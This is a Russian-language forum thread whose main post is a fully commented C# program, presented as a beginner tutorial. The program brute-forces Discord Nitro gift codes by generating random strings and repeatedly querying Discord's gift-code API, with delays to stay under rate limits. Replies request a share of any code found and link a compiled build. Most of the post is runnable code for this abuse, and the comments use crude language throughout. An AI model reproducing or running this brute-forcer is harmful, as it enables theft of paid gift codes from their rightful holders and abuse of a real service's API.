(C#) Брут дискорд нитро

Начинающий
Статус
Оффлайн
Реакции[?]
13
Поинты[?]
0
1. Данный гайд был создан потому что мне было ну совсем нечем заняться
2. Данный гайд был создан потому что я увидел вот этот гайд
3. Данный гайд был создан скорее для тех кто просто начинает изучать шарп и хочет увидеть пример какой-либо проги на шарпе с объяснением ее работы
4. Тулза энивей хуета и вы врятле набрутите себе нитро

Всё постарался объяснить в виде комментариев к коду

C#:
// Подключаем пространство имен для консоли и всего такого говна
using System;
// Подключаем пространство имен для работы с файлами и стримами(не на твиче блять)
using System.IO;
// Подключаем пространство имен для работы для отправки запросов
using System.Net;
// Подключаем пространство имен для потоков
using System.Threading;
// Подключаем пространство имен для криптостойкого генератора рандомных чисел
using System.Security.Cryptography;

namespace DiscordNitroGenerator {
    class Program {
        // Определяем константное числовое значение
        // Оно будет использовано позже для определения того, сколько потоку нужно будет подождать перед тем как вызывать сборщик мусора
        // 120 - кол-во секунд
        // 1000 - т.к. 1 секунда == 1000 милисекунд. В целом, можно было бы просто прописать 120000, разница вообщем-то отсутствует
        const int GC_COOLDOWN = 120 * 1000;

// Опять определяем константное числовое значение которое будет использовано позже
        // Вот тут важно
        // Дискорд не любит когда его задрачивают запросами, поэтому запросы мы будем слать 1 запрос каждые 5 секунд
        // Можно и чаще, но статус Rate Limited все равно будет ебать мозги
        const int MAIN_COOLDOWN = 5 * 1000;

// Определяем константную строку со всеми символами которые будут использованы для генерации кода
        const string CHARS = "1234567890ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz9876543210";

// Создаем экземпляр класса генератора рандомных чисел
        static readonly RandomNumberGenerator rng = new RNGCryptoServiceProvider();

// Создаем экземпляр уже другого класса генератора рандомных чисел
        // Класс Random отличается от класса RandomNumberGenerator тем, что он не является криптостойким
        // В целом, в данной ситуации по большей то части похуй, насколько рнг криптостойкое, но почему бы и нет?
        static readonly Random random = new Random();

// Делаем метод для генерации рандомного числа с использованием класса Random
        // ну я думаю тут итак понятно все лол.
        static int rand(int max) {
            return random.Next(0, max);
        }

// Делаем метод для генерации рандомного числа с использованием класса RandomNumberGenerator
        // а вот тут уже посложнее
        static int rand_s(int max) {
            // Создаем буфер который будет заполнен методом GetBytes()
            // Т.к. возвращаемое число данного метода - int, выделяем под буфер столько же места, сколько тип данных int занимает в памяти, т.е. 4 байта(sizeof(int) == 4)
            byte[] data = new byte[sizeof(int)];
            // Заполняем буфер рандомными значениями вызвав GetBytes()
            rng.GetBytes(data);
            // Конвертируем все содержимое буфера в число и делим полученное число на максимальное значение типа данных int
            // Если честно в душе не понимаю зачем тут это деление, но без него не работает лол
            double u = BitConverter.ToInt32(data, 0) / (int.MaxValue + 1.0);
            // Тут уже чисто знания матеши ебаной, объясню только (int) перед вызовом Floor
            // Дописав (int) перед вызовом Floor, мы преобразуем тип данных double(т.к. Floor возвращает именно этот тип данных) в тип данных int, т.к. наш метод должен вовращать именно int
            // Подробнее про преобразования можно почитать тут: https://docs.microsoft.com/ru-ru/dotnet/csharp/programming-guide/types/casting-and-type-conversions
            return (int)Math.Floor((double)max * u);
        }

// Делаем метод для генерации рандомной строки, т.е. нашего волшебного "кода для получения Discord Nitro"
        static string randstr(int length) {
            // Создаем буфер(размером указанным в аргументах метода) который будет заполняться рандомными символами
            char[] c = new char[length];
            // Делаем цикл продолжающийся до тех пор, пока кол-во итераций не будет равно размеру буфера
            for (int i = 0; i < c.Length; i++)
                c[i] = CHARS[rand(CHARS.Length)]; // При каждой итерации буфер будет заполняться символом с рандомным индексом из того списка, который был определен в начале
            // Создаем из уже заполненного буфера строку и возвращаем ее
            return new string(c);
        }

// Делаем метод для генерации рандомной строки, т.е. нашего волшебного "кода для получения Discord Nitro"
        // Этот метод абсолютно такой же как и предыдущий, но использует другой созданный нами генератор рандомных чисел
        static string randstr_s(int length) {
            char[] c = new char[length];
            for (int i = 0; i < c.Length; i++)
                c[i] = CHARS[rand_s(CHARS.Length)];
            return new string(c);
        }

// Создадим метод для отправки GET запросов с нашим кодом
        // out - это модификатор позволяющий передать аргумент
        // Про out можно почитать тут: https://docs.microsoft.com/ru-ru/dotnet/csharp/language-reference/keywords/out-parameter-modifier
        static void webrequest_get(string url, string data, out string r) {
            // Создаем экземпляр класса HttpWebRequest, отправляем запрос
            HttpWebRequest request = (HttpWebRequest)WebRequest.Create(url + data);
            // Говорим HttpWebRequest'у что метод запроса должен быть именно GET
            request.Method = "GET";
            // Создаем экземпляр класса HttpWebResponse
            HttpWebResponse response = null;

// Получаем ответ (Какого-то хуя оно только так работает.
            // Блять, когда я писал этот код я не планировал что так получится.
            // Но если что, про try-catch можно почитать тут: https://docs.microsoft.com/ru-ru/dotnet/csharp/language-reference/keywords/try-catch)
            try {
                response = (HttpWebResponse)request.GetResponse();
            }
            // Если эта сука по какой-то причине выдала 404 Not Found, то ловим исключение и читаем ответ из него
            catch (WebException webex) {
                response = (HttpWebResponse)webex.Response;
            }
            // Создаем экземпляр класса Stream, получаем стрим для чтения ответа
            Stream stream = response.GetResponseStream();
            // Создаем экземпляр класса StreamReader, для того чтобы прочитать стрим с ответом
            StreamReader reader = new StreamReader(stream);
            // Читаем ответ, присваиваем его переменной r для дальнейшей передачи этого ответа другой переменной
            r = reader.ReadToEnd();
            // Удалим 3 ранее созданных экземпляра классов из памяти
            // Эти методы можно не вызывать в том случае, если вы юзаете using(что в идеале и нужно делать, просто я дебил)
            response.Dispose();
            stream.Dispose();
            reader.Dispose();

// Как и писалось ранее, я дебил и в идеале этот код должен выглядеть вот так
            /*
            HttpWebRequest request = (HttpWebRequest)WebRequest.Create(url);
            using (HttpWebResponse response = (HttpWebResponse)request.GetResponse())
            using (Stream stream = response.GetResponseStream())
            using (StreamReader reader = new StreamReader(stream)) {
                r = reader.ReadToEnd();
            }
            */
        }

// Создадим метод для сбора мусора.
        // В идеале этого мусора быть итак не должно, но почему бы и нет.
        static void collect_garbage() {
            // Запускаем бесконечный цикл (while (true) и for (;;) - это одно и то же, если что.)
            for (; ; ) {
                // Заставляем поток ждать то кол-во времени, которое было указано в начале.
                Thread.Sleep(GC_COOLDOWN);
                // Вызываем сборщик мусора.
                GC.Collect();
            }
        }

static void Main(string[] args) {
            // Даем пользователю самому выбрать, какой генератор рандомных чисел будет использован
            // Для этого создадим булевую, значение которой будет зависить от того был ли указан аргумент -srng(или --securerng) и были ли указаны какие-либо аргументы вообще
            bool srng = args.Length > 0 && (args[0] == "-srng" || args[0] == "--securerng");

// Создадим поток, вызовем в нем метод для сбора мусора, запустим поток
            new Thread(collect_garbage).Start();

// Бесконечный цикл
            for (; ; ) {
                string response; // Определим переменную которой будем передавать ответ на запрос
                // Думаю стоит пояснить за это выражение
                // ?: - это условный оператор
                // Подробно расписывать не буду(ибо можно почитать тут: https://docs.microsoft.com/ru-ru/dotnet/csharp/language-reference/operators/conditional-operator), лишь покажу его синтаксис
                // condition ? true : false (выражение ? верно : не верно)
                // Как я думаю понятно, выражение может представлять из себя ссылку на булевую(как в нашем случае)
                string code = (srng ? randstr_s(16) : randstr(16));
                // Отправляем запрос
                webrequest_get("http://discord.com/api/v6/entitlements/gift-codes/", code + "?with_application=false&with_subscription_plan=true", out response);
                // Делаем проверку на валидность кода(или на то не получили ли вы статус Rate Limited, лол)
                // Если код валидный, то выводим его в консоль и завершаем цикл(при помощи break;)
                // Если же не валидный, то все равно выводим его в консоль вместе с ответом от дискорда
                if (!response.Contains("Unknown Gift Code") && !response.Contains("You are being rate limited.")) {
                    Console.WriteLine(code);
                    break;
                }
                else Console.WriteLine(code + " : " + response);
                // Удаляем из памяти две строки определенные выше
                // Так обычно никто не делает, да и смысла вроде как нет, просто я люблю собирать мусор в ручную лол
                // (хотя, просто для справки: такой прием помогает от дампа памяти(в шарпе нет деструкторов так что всякие буферы часто остаются в памяти))
                response = null;
                code = null;

// Заставим поток поспать, дабы программа не жрала слишком много ресурсов, да и дискорд не любит когда ему спамят запросами
                Thread.Sleep(MAIN_COOLDOWN);
            }

// Ждем пока пользователь нажмет кнопку
            // Без этой строки консоль просто закроется после выхода из цикла
            // Хотя нахуй я это написал, это же прям пиздец какие азы, думаю даже обезьяна знает зачем тут эта строка.
            Console.ReadKey();
        }
    }
}

Участник
Статус
Оффлайн
Реакции[?]
395
Поинты[?]
1K
у тя ник ахуенный и брутер крутой если набрутишь ак дай мне ок я тя поцелую

Пользователь
Статус
Оффлайн
Реакции[?]
115
Поинты[?]
0
Сделал прогу согласно коду, вдруг кто не сможет сделать программу - скинул сурс.
Пожалуйста, авторизуйтесь для просмотра ссылки.

GOVARD Трансгендер! Кхм. Что-то не то сказал!
Забаненный
Статус
Оффлайн
Реакции[?]
107
Поинты[?]
0
Обратите внимание, пользователь заблокирован на форуме. Не рекомендуется проводить сделки.
Сделал прогу согласно коду, вдруг кто не сможет сделать программу - скинул сурс.

Я чуть чуть глупенький его запускать при запущеном дсе или не обязательно?

Пользователь
Статус
Оффлайн
Реакции[?]
115
Поинты[?]
0
Сверху Снизу